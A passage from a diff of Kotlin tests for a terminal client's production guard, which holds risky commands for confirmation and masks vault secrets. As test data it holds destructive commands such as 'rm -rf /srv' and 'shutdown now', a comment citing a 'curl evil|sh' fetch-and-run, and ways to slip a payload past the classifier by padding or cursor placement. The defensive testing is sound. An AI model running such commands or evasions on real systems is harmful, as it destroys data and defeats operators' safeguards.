+    /**
+     * The danger can sit entirely right of the cursor: the prefix alone reads harmless, and no
+     * dialog opened at all. The whole row is what runs, so the whole row is classified.
+     */
+    @Test
+    fun `a risky tail right of the cursor still trips the guard`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val state = TerminalScreenState(session, scope)
+        state.guardPolicy = ProductionGuardPolicy(production = true, confirmWarnings = true)
+
+        // Cursor parked right after the prompt: everything the shell will run is right of it.
+        val line = "root@prod:~# rm -rf /srv/prod-db"
+        session.emit((line + "\u001b[${"rm -rf /srv/prod-db".length}D").encodeToByteArray())
+        state.typeInput("\r")
+
+        assertNotNull(state.pendingGuarded, "the row right of the cursor ran unclassified")
+        scope.cancel()
+    }
+
+    /**
+     * The screen's line gets the same net as pasted input: a recalled command longer than the
+     * classifier's window — realistic now that the soft-wrap join reconstructs the whole line —
+     * used to run with no dialog when its risk sat past character 512.
+     */
+    @Test
+    fun `a recalled line the classifier cannot fully read is held`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val state = TerminalScreenState(session, scope)
+        state.guardPolicy = ProductionGuardPolicy(production = true, confirmWarnings = true)
+
+        // The risky span sits past the classifier's 512-character window of the joined line AND
+        // off the cursor row (harmless text follows it), so no candidate any rule reads carries it.
+        val command = "echo " + "a".repeat(590) + "; rm -rf /srv; echo " + "b".repeat(100)
+        session.emit(("root@prod:~# " + command).encodeToByteArray())
+        state.typeInput("\r")
+
+        assertNotNull(state.pendingGuarded, "the tail past the classifier's window ran unasked")
+        scope.cancel()
+    }
+
+    // --- The classifier's caps can be padded past ---
+
+    /**
+     * A line longer than MAX_GUARDED_COMMAND_LENGTH is classified only up to the cut, so a payload
+     * past character 512 used to run with no dialog at all. On a production host, exceeding what
+     * the classifier reads is itself worth the question.
+     */
+    @Test
+    fun `a line padded past the classifier's length cap is held`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val state = TerminalScreenState(session, scope)
+        state.guardPolicy = ProductionGuardPolicy(production = true, confirmWarnings = true)
+
+        state.paste("x".repeat(600) + " && rm -rf /srv\n")
+
+        assertNotNull(state.pendingGuarded, "the payload past the length cap ran unasked")
+        scope.cancel()
+    }
+
+    /** The same for the candidate-count cap: a payload on line 201 of a block. */
+    @Test
+    fun `a block padded past the classifier's line cap is held`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val state = TerminalScreenState(session, scope)
+        state.guardPolicy = ProductionGuardPolicy(production = true, confirmWarnings = true)
+
+        val block = (1..200).joinToString("\n") { "echo $it" } + "\nrm -rf /srv\n"
+        state.paste(block)
+
+        assertNotNull(state.pendingGuarded, "the payload past the line cap ran unasked")
+        scope.cancel()
+    }
+
+    /** An ordinary block inside both caps still passes when harmless. */
+    @Test
+    fun `a harmless block inside the caps is not held`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val state = TerminalScreenState(session, scope)
+        state.guardPolicy = ProductionGuardPolicy(production = true, confirmWarnings = true)
+
+        state.paste("echo one\necho two\n")
+
+        assertNull(state.pendingGuarded)
+        scope.cancel()
+    }
+
+    // --- The aside states a length capped at 512 ---
+
+    /**
+     * `candidatesOf` cuts each line to 512 characters on the way in, so the aside for a risky line
+     * sitting past what the quote can draw used to read "shown in part · 512 chars" for a
+     * 900-character line. The real length is carried beside the cut candidate.
+     */
+    @Test
+    fun `the aside for a long input line states the uncut length`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val state = TerminalScreenState(session, scope)
+        state.guardPolicy = ProductionGuardPolicy(production = true, confirmWarnings = true)
+
+        // ~9000 chars of harmless filler push the risky line past MAX_DRAWN_COMMAND_CHARS, so it is
+        // drawn as an aside; the line itself is 900 chars with the reason inside the first 512.
+        val filler = (1..20).joinToString("\n") { "echo " + "a".repeat(445) }
+        val risky = "rm -rf /srv/" + "b".repeat(888)
+        state.paste("$filler\n$risky\n")
+
+        val aside = state.pendingGuardedAside
+        assertNotNull(aside, "the risky line past the drawn quote lost its aside")
+        assertEquals(risky.length, aside.length, "the aside states the classifier's cut, not the line's length")
+        scope.cancel()
+    }
+
+    // --- A secret answered to a prompt is not quoted ---
+
+    /**
+     * [TerminalScreenState.typeInput] skips the guard while a secret is being taken — parking one in
+     * a dialog would print it in clear. `sendUserInputGuarded` had no such gate, so a snippet
+     * answering a password prompt could be held and quoted on screen.
+     */
+    @Test
+    fun `a ready-made line sent at a secret prompt is not held or quoted`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val state = TerminalScreenState(session, scope)
+        state.guardPolicy = ProductionGuardPolicy(production = true, confirmWarnings = true)
+        session.echoOff = true // the transport reports a password prompt
+
+        state.sendUserInputGuarded("rm -rf /tmp/scratch\r")
+
+        assertNull(state.pendingGuarded, "a secret-prompt answer was parked in a dialog")
+        assertTrue(
+            session.sent.any { it.decodeToString().contains("rm -rf /tmp/scratch") },
+            "the answer never reached the host",
+        )
+        scope.cancel()
+    }
+
+    // --- A resolved vault secret is masked in the quote ---
+
+    /**
+     * A `sudo -S … ${'$'}{{vault:…}}` snippet on a #prod host trips the guard one dialog after
+     * [app.skerry.ui.snippet.SnippetRunDialog] deliberately masked the secret. The guard's quote
+     * masks the same spans; classification and the replayed bytes stay the real text.
+     */
+    @Test
+    fun `a resolved vault secret is masked in the quote and replayed for real`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val state = TerminalScreenState(session, scope)
+        state.guardPolicy = ProductionGuardPolicy(production = true, confirmWarnings = true)
+
+        state.sendUserInputGuarded("echo hunter2 | sudo -S systemctl stop nginx\n", secrets = listOf("hunter2"))
+
+        assertNotNull(state.pendingGuarded, "the risky line with a secret was not held")
+        assertFalse("hunter2" in state.pendingGuardedQuote, "the resolved secret is printed in clear")
+        assertTrue(SECRET_MASK in state.pendingGuardedQuote, "the masked span is not drawn at all")
+
+        state.confirmGuardedCommand()
+        assertTrue(
+            session.sent.any { "hunter2" in it.decodeToString() },
+            "what runs must be the real line, not the masked one",
+        )
+        scope.cancel()
+    }
+
+    // --- A completion read off the screen stays out of the palette ---
+
+    /**
+     * What the host drew as a completion is recorded so the ghost and reverse search keep working,
+     * but it is host-authored text: persisted under the host key it used to reach the cross-host
+     * command palette, offering `ls /etc; curl evil|sh` while connected somewhere else. The
+     * persisted list carries only what the user typed.
+     */
+    @Test
+    fun `a completion recorded from the screen is not persisted`() = runTest {
+        val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
+        val session = FakeSession()
+        val history = mutableListOf<List<String>>()
+        val state = TerminalScreenState(session, scope, onHistoryChanged = { history += it })
+
+        "ls".forEach { state.typeInput(it.toString()) }
+        session.emit("$ ls".encodeToByteArray()) // the echo of what was typed
+        state.typeInput("\t") // an unconsumed Tab goes to the shell
+        session.emit(" /etc".encodeToByteArray()) // the shell answers with a completion
+        state.typeInput("\r")
+
+        assertTrue(history.isNotEmpty(), "the commit never reached the history callback")
+        assertTrue(
+            history.flatten().none { it == "ls /etc" },
+            "a host-drawn completion was persisted: $history",
+        )
+
+        // The session's own ghost still knows it: type the prefix again and a suggestion stands.
+        "ls".forEach { state.typeInput(it.toString()) }
+        assertTrue(state.hasSuggestion, "the in-session ghost lost the completed command")
+        scope.cancel()
+    }
+}
+
+private class FakeSession : TerminalSession {
+    private val _state = MutableStateFlow<TerminalState>(TerminalState.Open)
+    override val state: StateFlow<TerminalState> = _state
+
+    private val emissions = Channel<ByteArray>(Channel.UNLIMITED)
+    override val output: Flow<ByteArray> = flow {
+        for (chunk in emissions) emit(chunk)
+    }
+
+    val sent = mutableListOf<ByteArray>()
+
+    /** Host stopped echoing — how the transport reports a password prompt. */
+    var echoOff = false
+    override val echoSuppressed: Boolean get() = echoOff
+
+    suspend fun emit(chunk: ByteArray) = emissions.send(chunk)
+
+    override suspend fun send(data: ByteArray) {
+        sent += data
+    }
+
+    override suspend fun resize(size: PtySize) {}
+
+    override suspend fun close() {
+        _state.value = TerminalState.Closed()
+        emissions.close()
+    }
+}

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/terminal/ProductionGuardHoldTest.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/terminal/ProductionGuardHoldTest.kt
@@ -2,10 +2,14 @@ package app.skerry.ui.terminal
 
 import app.skerry.shared.guard.MAX_GUARDED_CANDIDATES
 import app.skerry.shared.guard.MAX_GUARDED_COMMAND_LENGTH
+import app.skerry.shared.ai.CommandRiskReason
+import app.skerry.shared.guard.ProductionGuard
 import app.skerry.shared.guard.ProductionGuardPolicy
+import app.skerry.ui.snippet.maskSecrets
 import kotlin.test.Test
 import kotlin.test.assertEquals
 import kotlin.test.assertFalse
+import kotlin.test.assertNotNull
 import kotlin.test.assertNull
 import kotlin.test.assertTrue
 
@@ -23,7 +27,7 @@ class ProductionGuardHoldTest {
     fun a_session_with_no_guard_holds_nothing_and_never_classifies() {
         val hold = ProductionGuardHold()
         var asked = false
-        assertFalse(hold.hold("rm -rf /\n", HeldInputSource.Typed) { asked = true; listOf("rm -rf /") })
+        assertFalse(hold.hold("rm -rf /\n", HeldInputSource.Typed) { policy -> asked = true; ProductionGuard.inspect(listOf("rm -rf /"), policy) })
         // Reading the screen and the tracked line is wasted work off a production host.
         assertFalse(asked)
         assertNull(hold.pending)
@@ -32,7 +36,7 @@ class ProductionGuardHoldTest {
     @Test
     fun a_risky_block_is_held_with_the_input_to_replay() {
         val hold = guarding()
-        assertTrue(hold.hold("rm -rf /srv\n", HeldInputSource.Paste) { listOf("rm -rf /srv") })
+        assertTrue(hold.hold("rm -rf /srv\n", HeldInputSource.Paste) { policy -> ProductionGuard.inspect(listOf("rm -rf /srv"), policy) })
         assertEquals("rm -rf /srv", hold.pending?.command)
         assertEquals(HeldInput("rm -rf /srv\n", HeldInputSource.Paste), hold.take())
         assertNull(hold.pending)
@@ -41,11 +45,11 @@ class ProductionGuardHoldTest {
     @Test
     fun nothing_else_runs_while_something_is_held() {
         val hold = guarding()
-        hold.hold("rm -rf /srv\n", HeldInputSource.Typed) { listOf("rm -rf /srv") }
+        hold.hold("rm -rf /srv\n", HeldInputSource.Typed) { policy -> ProductionGuard.inspect(listOf("rm -rf /srv"), policy) }
 
         var asked = false
         // Harmless or not, it is held back — and it isn't even classified: the answer is the same.
-        assertTrue(hold.hold("uptime\n", HeldInputSource.Command) { asked = true; listOf("uptime") })
+        assertTrue(hold.hold("uptime\n", HeldInputSource.Command) { policy -> asked = true; ProductionGuard.inspect(listOf("uptime"), policy) })
         assertFalse(asked)
         // What was dropped stays dropped: the pending command is still the one being asked about.
         assertEquals("rm -rf /srv", hold.pending?.command)
@@ -61,7 +65,7 @@ class ProductionGuardHoldTest {
     fun a_held_paste_is_quoted_whole() {
         val hold = guarding()
         val block = "rm -rf /srv\nchown -R nobody /srv/www\n"
-        assertTrue(hold.hold(block, HeldInputSource.Paste) { listOf("rm -rf /srv", "chown -R nobody /srv/www", "") })
+        assertTrue(hold.hold(block, HeldInputSource.Paste) { policy -> ProductionGuard.inspect(listOf("rm -rf /srv", "chown -R nobody /srv/www", ""), policy) })
         assertEquals("rm -rf /srv", hold.pending?.command)
         assertEquals("rm -rf /srv\nchown -R nobody /srv/www", hold.pendingQuote)
     }
@@ -77,7 +81,7 @@ class ProductionGuardHoldTest {
         val hold = guarding()
         // Enter over a line recalled from history: nothing was typed, so the tracked lines are blank.
         assertTrue(
-            hold.hold("\r", HeldInputSource.Typed, screenGuesses = { listOf("rm -rf /srv/data") }) { listOf("", "") },
+            hold.hold("\r", HeldInputSource.Typed, screenGuesses = { listOf("rm -rf /srv/data") }) { policy -> ProductionGuard.inspect(listOf("", ""), policy) },
         )
         assertEquals("rm -rf /srv/data", hold.pending?.command)
         assertEquals("rm -rf /srv/data", hold.pendingQuote)
@@ -99,7 +103,7 @@ class ProductionGuardHoldTest {
                 HeldInputSource.Typed,
                 quote = { " --force" },
                 screenGuesses = { listOf("rm -rf /srv") },
-            ) { listOf(" --force", "") },
+            ) { policy -> ProductionGuard.inspect(listOf(" --force", ""), policy) },
         )
         assertEquals("rm -rf /srv", hold.pending?.command)
         assertEquals(" --force", hold.pendingQuote)
@@ -115,15 +119,15 @@ class ProductionGuardHoldTest {
     fun a_line_too_long_for_the_classifier_reports_its_real_length() {
         val hold = guarding()
         val long = "rm -rf /srv/" + "a".repeat(MAX_GUARDED_COMMAND_LENGTH)
-        assertTrue(hold.hold("\r", HeldInputSource.Typed, screenGuesses = { listOf(long) }) { listOf("", "") })
+        assertTrue(hold.hold("\r", HeldInputSource.Typed, screenGuesses = { listOf(long) }) { policy -> ProductionGuard.inspect(listOf("", ""), policy) })
         assertEquals(MAX_GUARDED_COMMAND_LENGTH, hold.pendingQuote.length)
         assertEquals(long.length, hold.pendingQuoteLength)
 
         // The same line as the guess drawn beside a quote, where it has a length of its own.
         val beside = guarding()
         assertTrue(
-            beside.hold("docker ps\n", HeldInputSource.Paste, screenGuesses = { listOf(long) }) {
-                listOf("docker ps", "")
+            beside.hold("docker ps\n", HeldInputSource.Paste, screenGuesses = { listOf(long) }) { policy ->
+                ProductionGuard.inspect(listOf("docker ps", ""), policy)
             },
         )
         assertEquals(MAX_GUARDED_COMMAND_LENGTH, beside.pendingAside?.line?.length)
@@ -144,7 +148,7 @@ class ProductionGuardHoldTest {
                 HeldInputSource.Typed,
                 quote = { "" },
                 partialGuess = { PartialGuess("rm -rf /srv/bac", "rm -rf /srv/bac") },
-            ) { listOf("", "") },
+            ) { policy -> ProductionGuard.inspect(listOf("", ""), policy) },
         )
         assertEquals("rm -rf /srv/bac", hold.pendingQuote)
         assertNull(hold.pendingQuoteLength)
@@ -164,7 +168,7 @@ class ProductionGuardHoldTest {
                 HeldInputSource.Paste,
                 quote = { "m -rf /var" },
                 partialGuess = { PartialGuess("sudo rm -rf /srv", "sudo rm -rf /srv") },
-            ) { listOf("m -rf /var", "") },
+            ) { policy -> ProductionGuard.inspect(listOf("m -rf /var", ""), policy) },
         )
         assertEquals("m -rf /var", hold.pendingQuote)
         assertEquals(GuardAside("sudo rm -rf /srv", null, onLine = true), hold.pendingAside)
@@ -184,7 +188,7 @@ class ProductionGuardHoldTest {
                 HeldInputSource.Command,
                 quote = { "uptime" },
                 partialGuess = { PartialGuess(classify = "rm -rf /sruptime", onLine = "rm -rf /sr") },
-            ) { listOf("uptime", "") },
+            ) { policy -> ProductionGuard.inspect(listOf("uptime", ""), policy) },
         )
         assertEquals("rm -rf /sruptime", hold.pending?.command, "the join is what found the reason")
         assertEquals("uptime", hold.pendingQuote)
@@ -204,7 +208,7 @@ class ProductionGuardHoldTest {
                 HeldInputSource.Paste,
                 quote = { "; systemctl restart nginx" },
                 partialGuess = { PartialGuess("rm -rf /srv/back; systemctl restart nginx", "rm -rf /srv/back") },
-            ) { listOf("; systemctl restart nginx", "") },
+            ) { policy -> ProductionGuard.inspect(listOf("; systemctl restart nginx", ""), policy) },
         )
         assertEquals("; systemctl restart nginx", hold.pendingQuote)
         assertEquals("rm -rf /srv/back", hold.pendingAside?.line)
@@ -225,7 +229,7 @@ class ProductionGuardHoldTest {
                 quote = { "docker ps" },
                 screenGuesses = { listOf("rm -rf /srv/data") },
                 partialGuess = { PartialGuess("apt-get instadocker ps", "apt-get insta") },
-            ) { listOf("docker ps", "") },
+            ) { policy -> ProductionGuard.inspect(listOf("docker ps", ""), policy) },
         )
         assertEquals("rm -rf /srv/data", hold.pending?.command)
         assertEquals("rm -rf /srv/data", hold.pendingAside?.line, "the dialog explained a line it never drew")
@@ -246,7 +250,7 @@ class ProductionGuardHoldTest {
                 quote = { "" },
                 screenGuesses = { listOf("sudo systemctl stop nginx") },
                 partialGuess = { PartialGuess(classify = "rm -rf /srv/backx", onLine = null) },
-            ) { listOf("", "") },
+            ) { policy -> ProductionGuard.inspect(listOf("", ""), policy) },
         )
         assertEquals("rm -rf /srv/backx", hold.pending?.command, "the worst is still what is asked about")
         assertEquals("", hold.pendingQuote)
@@ -263,7 +267,7 @@ class ProductionGuardHoldTest {
         val hold = guarding()
         val padding = "# keep the old unit file\n".repeat(400)
         val block = "rm -rf /srv\n$padding"
-        assertTrue(hold.hold(block, HeldInputSource.Paste) { listOf("rm -rf /srv") })
+        assertTrue(hold.hold(block, HeldInputSource.Paste) { policy -> ProductionGuard.inspect(listOf("rm -rf /srv"), policy) })
         assertEquals(block.trimEnd().length, hold.pendingQuoteLength)
         assertTrue(hold.pendingQuote.length < block.trimEnd().length, "the quote was not cut")
         assertTrue(hold.pendingQuote.startsWith("rm -rf /srv"), "the tripped line is not in the quote")
@@ -281,7 +285,7 @@ class ProductionGuardHoldTest {
         val hold = guarding()
         val padding = "# keep the old unit file\n".repeat(400)
         val block = padding + "rm -rf /srv\n"
-        assertTrue(hold.hold(block, HeldInputSource.Paste) { listOf("rm -rf /srv") })
+        assertTrue(hold.hold(block, HeldInputSource.Paste) { policy -> ProductionGuard.inspect(listOf("rm -rf /srv"), policy) })
         assertTrue(hold.pendingQuote.startsWith("# keep the old unit file"), "the quote is not the block")
         assertEquals(block.trimEnd().length, hold.pendingQuoteLength)
         assertEquals(GuardAside("rm -rf /srv", "rm -rf /srv".length, onLine = false), hold.pendingAside)
@@ -297,8 +301,8 @@ class ProductionGuardHoldTest {
         val hold = guarding()
         val block = "docker ps\nuptime\n"
         assertTrue(
-            hold.hold(block, HeldInputSource.Paste, screenGuesses = { listOf("rm -rf /srv/data") }) {
-                listOf("docker ps", "uptime", "")
+            hold.hold(block, HeldInputSource.Paste, screenGuesses = { listOf("rm -rf /srv/data") }) { policy ->
+                ProductionGuard.inspect(listOf("docker ps", "uptime", ""), policy)
             },
         )
         assertEquals("rm -rf /srv/data", hold.pending?.command, "the screen still gives the reason")
@@ -319,7 +323,7 @@ class ProductionGuardHoldTest {
                 " --one-file-system\n",
                 HeldInputSource.Paste,
                 screenGuesses = { listOf("rm -rf /srv/data/archive") },
-            ) { listOf(" --one-file-system", "") },
+            ) { policy -> ProductionGuard.inspect(listOf(" --one-file-system", ""), policy) },
         )
         assertEquals(" --one-file-system", hold.pendingQuote)
         assertEquals(" --one-file-system".length, hold.pendingQuoteLength)
@@ -341,7 +345,7 @@ class ProductionGuardHoldTest {
                 block,
                 HeldInputSource.Paste,
                 screenGuesses = { listOf("sudo rm -rf /var") },
-            ) { listOf("chmod 777 /tmp") },
+            ) { policy -> ProductionGuard.inspect(listOf("chmod 777 /tmp"), policy) },
         )
         assertEquals("sudo rm -rf /var", hold.pending?.command)
         assertEquals("sudo rm -rf /var", hold.pendingAside?.line)
@@ -363,7 +367,7 @@ class ProductionGuardHoldTest {
                 lines.joinToString("\n"),
                 HeldInputSource.Paste,
                 screenGuesses = { listOf("user@host:~$") },
-            ) { lines },
+            ) { policy -> ProductionGuard.inspect(lines, policy) },
         )
         assertEquals("rm -rf /srv", hold.pending?.command)
 
@@ -374,9 +378,84 @@ class ProductionGuardHoldTest {
                 List(MAX_GUARDED_CANDIDATES) { "echo $it" }.joinToString("\n"),
                 HeldInputSource.Paste,
                 screenGuesses = { listOf("rm -rf /srv") },
-            ) { List(MAX_GUARDED_CANDIDATES) { "echo $it" } },
+            ) { policy -> ProductionGuard.inspect(List(MAX_GUARDED_CANDIDATES) { "echo $it" }, policy) },
         )
         assertEquals("rm -rf /srv", guessing.pending?.command)
+    }
+
+    /**
+     * A screen row the cursor sits inside of is a beginning of the line that runs: the aside may
+     * draw it, but no count over it would be true — everything right of the cursor is not in it.
+     */
+    @Test
+    fun a_screen_finding_from_a_row_the_cursor_sits_inside_reports_no_count() {
+        val hold = guarding()
+        assertTrue(
+            hold.hold(
+                "docker ps\n",
+                HeldInputSource.Paste,
+                screenGuesses = { listOf("rm -rf /srv/data") },
+                screenLineCut = { true },
+            ) { policy -> ProductionGuard.inspect(listOf("docker ps"), policy) },
+        )
+        assertEquals("rm -rf /srv/data", hold.pendingAside?.line)
+        assertNull(hold.pendingAside?.length, "the row continues past the cursor; a count claims it is whole")
+    }
+
+    /**
+     * The mask covers the aside as well as the quote: the line that tripped the guard can carry the
+     * resolved secret, and drawing it beside a masked quote would undo the masking one box lower.
+     */
+    @Test
+    fun a_secret_in_the_aside_is_masked() {
+        val hold = guarding()
+        assertTrue(
+            hold.hold(
+                "docker ps\n",
+                HeldInputSource.Paste,
+                present = { maskSecrets(it, listOf("hunter2")) },
+                screenGuesses = { listOf("echo hunter2 | sudo -S systemctl stop nginx") },
+            ) { policy -> ProductionGuard.inspect(listOf("docker ps"), policy) },
+        )
+        val aside = hold.pendingAside
+        assertNotNull(aside, "the tripped line lost its aside")
+        assertFalse("hunter2" in aside.line, "the resolved secret is drawn in the aside: ${aside.line}")
+        // The count follows the mask, as the quote's does: the raw length beside a masked line read
+        // as "shown in part" over a box that is fully drawn.
+        assertEquals(aside.line.length, aside.length, "a fully drawn masked aside claimed a hidden tail")
+    }
+
+    /**
+     * A masked quote that is fully on screen claims nothing hidden: the count describes the drawn
+     * (masked) text, because a pre-mask count read as "shown in part" over a dialog with nothing
+     * left to scroll to — the mask itself already marks what is redacted.
+     */
+    @Test
+    fun a_masked_quote_fully_drawn_claims_no_hidden_tail() {
+        val hold = guarding()
+        val line = "echo hunter2 | sudo -S systemctl stop nginx"
+        assertTrue(
+            hold.hold("$line\n", HeldInputSource.Command, present = { maskSecrets(it, listOf("hunter2")) }) { policy ->
+                ProductionGuard.inspect(listOf(line), policy)
+            },
+        )
+        assertEquals(hold.pendingQuote.length, hold.pendingQuoteLength, "a fully drawn masked quote claimed a hidden tail")
+    }
+
+    /**
+     * A rule's finding outranks the overflow fallback: it explains a risk that was actually read,
+     * and one confirmation is asked either way. BeyondInspection may only stand when no rule fired.
+     */
+    @Test
+    fun a_rule_finding_outranks_beyond_inspection() {
+        val hold = guarding()
+        val block = (listOf("rm -rf /srv") + List(MAX_GUARDED_CANDIDATES + 20) { "echo $it" }).joinToString("\n")
+        assertTrue(
+            hold.hold(block, HeldInputSource.Paste) { policy ->
+                ProductionGuard.inspectCandidates(ProductionGuard.candidatesOf(block), policy)
+            },
+        )
+        assertEquals(CommandRiskReason.RecursiveForceDelete, hold.pending?.assessment?.reason)
     }
 
     /** A guess that loses says nothing: the dialog would be stating a line that is not the reason. */
@@ -388,7 +467,7 @@ class ProductionGuardHoldTest {
                 "rm -rf /srv\n",
                 HeldInputSource.Paste,
                 screenGuesses = { listOf("sudo systemctl stop nginx") },
-            ) { listOf("rm -rf /srv") },
+            ) { policy -> ProductionGuard.inspect(listOf("rm -rf /srv"), policy) },
         )
         assertEquals("rm -rf /srv", hold.pending?.command)
         assertNull(hold.pendingAside)
@@ -398,18 +477,18 @@ class ProductionGuardHoldTest {
     fun a_typed_block_is_quoted_from_what_it_will_run() {
         val hold = guarding()
         // As the terminal calls it: the quote is what the shell line already holds plus this block.
-        assertTrue(hold.hold("rf /srv\r", HeldInputSource.Typed, quote = { "rm -" + "rf /srv\r" }) { listOf("rm -rf /srv", "") })
+        assertTrue(hold.hold("rf /srv\r", HeldInputSource.Typed, quote = { "rm -" + "rf /srv\r" }) { policy -> ProductionGuard.inspect(listOf("rm -rf /srv", ""), policy) })
         assertEquals("rm -rf /srv", hold.pendingQuote)
     }
 
     @Test
     fun the_quote_is_dropped_with_the_hold() {
         val hold = guarding()
-        hold.hold("rm -rf /srv\n", HeldInputSource.Paste) { listOf("rm -rf /srv") }
+        hold.hold("rm -rf /srv\n", HeldInputSource.Paste) { policy -> ProductionGuard.inspect(listOf("rm -rf /srv"), policy) }
         hold.take()
         assertEquals("", hold.pendingQuote)
 
-        hold.hold("rm -rf /srv\n", HeldInputSource.Paste) { listOf("rm -rf /srv") }
+        hold.hold("rm -rf /srv\n", HeldInputSource.Paste) { policy -> ProductionGuard.inspect(listOf("rm -rf /srv"), policy) }
         hold.dismiss()
         assertEquals("", hold.pendingQuote)
     }
@@ -417,7 +496,7 @@ class ProductionGuardHoldTest {
     @Test
     fun a_harmless_block_is_not_held() {
         val hold = guarding()
-        assertFalse(hold.hold("uptime\n", HeldInputSource.Typed) { listOf("uptime") })
+        assertFalse(hold.hold("uptime\n", HeldInputSource.Typed) { policy -> ProductionGuard.inspect(listOf("uptime"), policy) })
         assertNull(hold.pending)
         assertNull(hold.take())
     }
@@ -425,7 +504,7 @@ class ProductionGuardHoldTest {
     @Test
     fun confirming_twice_replays_nothing_the_second_time() {
         val hold = guarding()
-        hold.hold("shutdown now\n", HeldInputSource.Command) { listOf("shutdown now") }
+        hold.hold("shutdown now\n", HeldInputSource.Command) { policy -> ProductionGuard.inspect(listOf("shutdown now"), policy) }
 
         assertEquals("shutdown now\n", hold.take()?.text)
         // A double click on Confirm must not run the command again.
@@ -435,12 +514,12 @@ class ProductionGuardHoldTest {
     @Test
     fun dismissing_drops_the_held_input() {
         val hold = guarding()
-        hold.hold("shutdown now\n", HeldInputSource.Typed) { listOf("shutdown now") }
+        hold.hold("shutdown now\n", HeldInputSource.Typed) { policy -> ProductionGuard.inspect(listOf("shutdown now"), policy) }
 
         hold.dismiss()
         assertNull(hold.pending)
         assertNull(hold.take())
         // The next command is judged on its own again.
-        assertTrue(hold.hold("rm -rf /etc\n", HeldInputSource.Typed) { listOf("rm -rf /etc") })
+        assertTrue(hold.hold("rm -rf /etc\n", HeldInputSource.Typed) { policy -> ProductionGuard.inspect(listOf("rm -rf /etc"), policy) })
     }
 }

--- a/composeApp/src/commonTest/kotlin/app/skerry/ui/terminal/TerminalScreenStateTest.kt
+++ b/composeApp/src/commonTest/kotlin/app/skerry/ui/terminal/TerminalScreenStateTest.kt
@@ -839,7 +839,7 @@ class TerminalScreenStateTest {
      * paths are tab-completed, which is most of them.
      */
     @Test
-    fun `a command the shell completed is recorded as the shell has it`() = runTest {
+    fun `a command the shell completed serves the session but is not persisted`() = runTest {
         val scope = CoroutineScope(UnconfinedTestDispatcher(testScheduler))
         val session = FakeTerminalSession()
         var saved: List<String>? = null
@@ -850,7 +850,12 @@ class TerminalScreenStateTest {
         session.emit("root@prod:~# systemctl restart nginx.service".encodeToByteArray())
         state.typeInput("\r")
 
-        assertEquals(listOf("systemctl restart nginx.service"), saved)
+        // The persisted snapshot carries nothing: the completed text is the host's drawing, and a
+        // stored copy would surface in the cross-host palette as a command nobody typed.
+        assertEquals(emptyList(), saved)
+        // The session's own ghost still knows it, as the shell has it — not as the typed prefix.
+        "systemctl restart ngin".forEach { state.typeInput(it.toString()) }
+        assertTrue(state.hasSuggestion, "the completed command stopped serving the in-session ghost")
         scope.cancel()
     }
 

--- a/composeApp/src/desktopTest/kotlin/app/skerry/ui/design/CommandQuoteTest.kt
+++ b/composeApp/src/desktopTest/kotlin/app/skerry/ui/design/CommandQuoteTest.kt
@@ -21,6 +21,7 @@ import app.skerry.ui.desktop.runForm
 import app.skerry.ui.desktop.string
 import app.skerry.ui.generated.resources.Res
 import app.skerry.ui.generated.resources.command_clipped
+import app.skerry.ui.generated.resources.command_clipped_partial
 import kotlin.test.Test
 import kotlin.test.assertEquals
 import kotlin.test.assertFalse
@@ -264,6 +265,19 @@ class CommandQuoteTest {
             // between is not observable from here; what this pins is that the live region is the
             // node carrying it, and that the message lands at all.
             onNode(polite).assertContentDescriptionEquals(noticeText(4200))
+        }
+    }
+
+    /**
+     * The null-length notice — a quote known to be partial with no honest count, the shape a screen
+     * row continuing past the cursor publishes (issue #246) — is announced the same way. Without it
+     * a screen-reader user is never told the recalled line runs longer than what is drawn.
+     */
+    @Test
+    fun `a notice without a count is still announced`() {
+        runForm({ ClippedNotice(clipped = true, fullLength = null) }) {
+            waitForIdle()
+            onNode(polite).assertContentDescriptionEquals(string(Res.string.command_clipped_partial))
         }
     }
 

--- a/composeApp/src/desktopTest/kotlin/app/skerry/ui/host/ProdGuardDialogNameTest.kt
+++ b/composeApp/src/desktopTest/kotlin/app/skerry/ui/host/ProdGuardDialogNameTest.kt
@@ -3,12 +3,14 @@ package app.skerry.ui.host
 import androidx.compose.ui.test.ExperimentalTestApi
 import androidx.compose.ui.test.assertIsDisplayed
 import androidx.compose.ui.test.onNodeWithText
+import app.skerry.shared.ai.CommandRiskReason
 import app.skerry.shared.host.Host
 import app.skerry.ui.desktop.runForm
 import app.skerry.ui.desktop.string
 import app.skerry.ui.generated.resources.Res
 import app.skerry.ui.generated.resources.guard_prod_connect_message
 import app.skerry.ui.generated.resources.guard_prod_snippet_message
+import app.skerry.ui.generated.resources.risk_recursive_force_delete
 import kotlin.test.Test
 
 /**
@@ -39,6 +41,28 @@ class ProdGuardDialogNameTest {
     }) {
         onNodeWithText(string(Res.string.guard_prod_snippet_message, FLATTENED)).assertIsDisplayed()
         onNodeWithText(string(Res.string.guard_prod_snippet_message, SPOOFED)).assertDoesNotExist()
+    }
+
+    /**
+     * The risk caption comes from the caller, classified over the REAL line: the drawn line may
+     * carry masked vault secrets, and classifying the masked text would lose a reason that lives
+     * inside the resolved span (issue #246).
+     */
+    @Test
+    fun `the snippet confirmation draws the risk the caller classified`() = runForm({
+        ProdConnectDialog(
+            ProdConnectRequest(
+                host(),
+                // The whole command resolved from the vault and masked: classifying THIS string
+                // finds nothing, so a regression back to classifying the drawn line loses the
+                // caption and fails the assertion below.
+                snippetLine = "\u2022\u2022\u2022\u2022\u2022\u2022",
+                snippetRisk = CommandRiskReason.RecursiveForceDelete,
+            ) {},
+            onDismiss = {},
+        )
+    }) {
